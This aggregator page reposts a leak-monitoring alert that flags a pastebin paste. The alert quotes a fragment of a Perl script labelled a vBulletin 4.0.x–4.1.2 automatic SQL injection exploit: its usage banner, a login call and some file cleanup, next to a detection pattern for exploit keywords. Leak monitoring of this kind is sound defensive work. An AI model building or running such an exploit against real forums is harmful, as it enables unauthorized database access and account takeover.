Quantcast
Channel: pastebin.com – LeakedIn
Viewing all articles
Browse latest Browse all 2834

Potential leak of data: Exploit

$
0
0
Detected 3 occurrence(s) of ‘(remote|sql|injection|php|asp) exploit’: <http://target> <valid username> <valid passwd> <existent group> <userid to hack>\n"; print "Example: perl exploit.pl http://site.com myusername mypassword Administrators 1\n\n"; exit(1); } print "\n<! vBulletin 4.0.x => 4.1.2 Automatic SQL Injection exploit !>\n"; print "Author: D35m0nd142\n"; sleep(1); login($ARGV[1],$ARGV[2]); @files = ('vbloginout.txt','vbout.txt','vbloc.txt'); foreach $file (@files) { unlink $file; } Source: http://pastebin.com/raw.php?i=4GR4MbS6

Viewing all articles
Browse latest Browse all 2834

Latest Images

Trending Articles



Latest Images